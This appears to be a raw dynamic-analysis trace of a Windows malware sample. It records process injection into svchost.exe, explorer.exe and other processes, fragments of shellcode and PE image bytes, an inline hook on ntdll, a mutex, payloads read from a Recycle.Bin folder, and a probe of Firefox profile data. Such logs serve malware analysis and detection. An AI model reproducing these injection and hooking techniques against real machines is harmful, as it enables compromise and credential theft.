File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2049079925
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2049080322
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2049080588
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2049080828
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2049081301
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: 1FC0000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2049081548
Memory written PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 650000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2049107123
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2049107742
Memory written PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90CFEE Length: 5 Value: E9 BF 33 D4 83 success or wait 2049128706
Memory allocated PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2049130378
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2049131005
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049131131
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2049131339
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2049131568
Memory written PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2049928956
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2049929881
Thread delayed Time: 0 TID: 4214 success or wait 2049929927
Thread delayed Time: 0 TID: 4214 success or wait 2049930030
Thread delayed Time: 0 TID: 4214 success or wait 2049930993
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2049931384
Thread delayed Time: 0 TID: 4214 success or wait 2049931594
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2049932305
Memory written PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2049955286
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2049955351
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2049955577
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2049955955
Memory allocated PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 8F0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2049956149
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2049956310
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2049956601
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: 2950000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2049956857
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049957124
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2049957888
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2049959053
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2049959577
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2049960369
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2049960831
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1F70000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2049962008
Thread created PID: 1636 TID: 924 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2049962655
Memory written PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 8F0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2049994890
Memory attributes changed PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2050001319
Memory written PID: 2224 Path: C:\Program Files\Common Files\Microsoft Shared\VS7Debug\MDM.EXE Base: 7C90CFEE Length: 5 Value: E9 BF 33 FE 83 success or wait 2050023580
Memory allocated PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 216FBA8 Allocation Type: null Protection: page execute and read and write success or wait 2050025238
Memory attributes changed PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2050025374
Memory attributes changed PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2050025519
Memory attributes changed PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 46000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2050026536
Memory written PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BAD0000 Length: 286720 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 2051526728
Thread delayed Time: 0 TID: 4214 success or wait 2051535280
Thread delayed Time: 0 TID: 4214 success or wait 2051535763
Thread delayed Time: 0 TID: 4214 success or wait 2051538744
Thread delayed Time: 0 TID: 4214 success or wait 2051540013
Memory written PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: BADAFFC Length: 13 Value: B8 00 00 00 00 50 BA B0 15 AF 0B FF D2 success or wait 2051583768
Memory allocated PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: 9A0000 Length: 216FBD8 Allocation Type: null Protection: page execute and read and write success or wait 2051586301
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2051587213
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2051591753
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2051592339
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2051592615
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2051595349
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1F70000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2051596126
Memory written PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: 9A0000 Length: 4096 Value: 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 2051644504
Memory attributes changed PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2051647226
Memory written PID: 2264 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 5 Value: E9 BF 33 09 84 success or wait 2051705888
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2051713318
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2051714256
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F70000 Length: 216FA60 Allocation Type: null Protection: page execute and read and write success or wait 2051725641
Thread created PID: 1636 TID: 2196 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2051730554
Thread created PID: 1636 TID: 2188 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2051735329
Thread created PID: 1636 TID: 2192 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2051738031
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: normal Content Overwritten: false success or wait 2051756116
File other operation Disposition: PositionInformation Data : Offset: 5930 Path: C:\Recycle.Bin\07A49F015E0D693 success or wait 2051760722
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 4 Value: 03 12 C0 79 success or wait 2051760945
File opened Path: C:\Recycle.Bin\B6232F3AC2C.exe Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2051761615
File read Path: C:\Recycle.Bin\B6232F3AC2C.exe Offset: none Length: 254976 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 2051764189
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2052191213
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2052192331
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 2950000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 2052224097
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2052228982
Section loaded Path: \KnownDlls\DNSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid object name not found 2052253823
Section loaded Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid success or wait 2052255717
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 1F80000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2052368242
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2052371398
Section loaded Path: \KnownDlls\rasadhlp.dll Access: write and read and execute Type: unknown Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2052388703
Section loaded Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2052390200
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2052448067
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2052448854
Section loaded Path: \KnownDlls\RASAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid object name not found 2052469085
Section loaded Path: C:\WINDOWS\system32\rasapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid success or wait 2052471065
Section loaded Path: \KnownDlls\rasman.dll Access: write and read and execute Type: unknown Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid object name not found 2052485637
Section loaded Path: C:\WINDOWS\system32\rasman.dll Access: query and write and read and execute Type: image Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2052490021
Section loaded Path: \KnownDlls\TAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 2052508116
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid success or wait 2052510129
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: read Type: commit Baseaddress: 2950000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 2052555137
Thread delayed Time: 0 TID: 4214 success or wait 2052645825
Thread delayed Time: 0 TID: 4214 success or wait 2052646348
Thread delayed Time: 0 TID: 4214 success or wait 2052648767
Thread delayed Time: 0 TID: 4214 success or wait 2052650601
Section loaded Path: \KnownDlls\sensapi.dll Access: write and read and execute Type: unknown Baseaddress: 2950000 Size: 184320 Protection: readonly Mapped to pid: own pid object name not found 2052870621
Section loaded Path: C:\WINDOWS\system32\sensapi.dll Access: query and write and read and execute Type: image Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2052874690
Section loaded Path: \KnownDlls\msapsspc.dll Access: write and read and execute Type: unknown Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid object name not found 2052896609
Section loaded Path: C:\WINDOWS\system32\msapsspc.dll Access: query and write and read and execute Type: image Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2052901557
Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 71E50000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 2052908035
Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2052911266
Section loaded Path: \BaseNamedObjects\SENS Information Cache Access: read Type: unknown Baseaddress: 1FA0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2052959015
Section loaded Path: \KnownDlls\schannel.dll Access: write and read and execute Type: unknown Baseaddress: 1FA0000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 2052971127
Section loaded Path: C:\WINDOWS\system32\schannel.dll Access: query and write and read and execute Type: image Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid success or wait 2052972888
Section loaded Path: \KnownDlls\digest.dll Access: write and read and execute Type: unknown Baseaddress: 767F0000 Size: 163840 Protection: read write Mapped to pid: own pid object name not found 2053036336
Section loaded Path: C:\WINDOWS\system32\digest.dll Access: query and write and read and execute Type: image Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2053046139
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2053080117
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2053081545
Section loaded Path: \KnownDlls\msnsspc.dll Access: write and read and execute Type: unknown Baseaddress: 75B00000 Size: 86016 Protection: read write Mapped to pid: own pid object name not found 2053081856
Section loaded Path: C:\WINDOWS\system32\msnsspc.dll Access: query and write and read and execute Type: image Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid success or wait 2053090410
Section loaded Path: \KnownDlls\MSVCRT40.dll Access: write and read and execute Type: unknown Baseaddress: 747B0000 Size: 290816 Protection: read write Mapped to pid: own pid object name not found 2053097858
Section loaded Path: C:\WINDOWS\system32\msvcrt40.dll Access: query and write and read and execute Type: image Baseaddress: 78080000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2053099935
File opened Path: C:\WINDOWS\system32\wininet.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2053125457
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and write and read and execute and extend size Type: image Baseaddress: 2A10000 Size: 942080 Protection: readonly Mapped to pid: own pid image not at base 2053126248
Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: write and read and execute Type: commit Baseaddress: 2950000 Size: 139264 Protection: execute Mapped to pid: own pid success or wait 2053185329
Section loaded Path: C:\WINDOWS\system32\msv1_0.dll Access: query and write and read and execute Type: image Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2053194147
Section loaded Path: \KnownDlls\cryptdll.dll Access: write and read and execute Type: unknown Baseaddress: 77C70000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 2053210628
Section loaded Path: C:\WINDOWS\system32\cryptdll.dll Access: query and write and read and execute Type: image Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 2053217450
Section loaded Path: \KnownDlls\MPRAPI.dll Access: write and read and execute Type: unknown Baseaddress: 76790000 Size: 49152 Protection: read write Mapped to pid: own pid object name not found 2053496783
Section loaded Path: C:\WINDOWS\system32\mprapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D40000 Size: 98304 Protection: read write Mapped to pid: own pid success or wait 2053500947
Section loaded Path: \KnownDlls\ACTIVEDS.dll Access: write and read and execute Type: unknown Baseaddress: 76D40000 Size: 98304 Protection: read write Mapped to pid: own pid object name not found 2053514563
Section loaded Path: C:\WINDOWS\system32\activeds.dll Access: query and write and read and execute Type: image Baseaddress: 77CC0000 Size: 204800 Protection: read write Mapped to pid: own pid success or wait 2053520460
Section loaded Path: \KnownDlls\adsldpc.dll Access: write and read and execute Type: unknown Baseaddress: 77CC0000 Size: 204800 Protection: read write Mapped to pid: own pid object name not found 2053528764
Section loaded Path: C:\WINDOWS\system32\adsldpc.dll Access: query and write and read and execute Type: image Baseaddress: 76E10000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2053533991
Section loaded Path: \KnownDlls\hnetcfg.dll Access: write and read and execute Type: unknown Baseaddress: 76E10000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 2053641999
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2053644244
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: 2960000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2053682090
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2053689718
Thread delayed Time: 0 TID: 4214 success or wait 2053765945
Thread delayed Time: 0 TID: 4214 success or wait 2053766216
Thread delayed Time: 0 TID: 4214 success or wait 2053768445
Thread delayed Time: 0 TID: 4214 success or wait 2053769820
File opened Path: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\profiles.ini Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false object name not found 2053832341
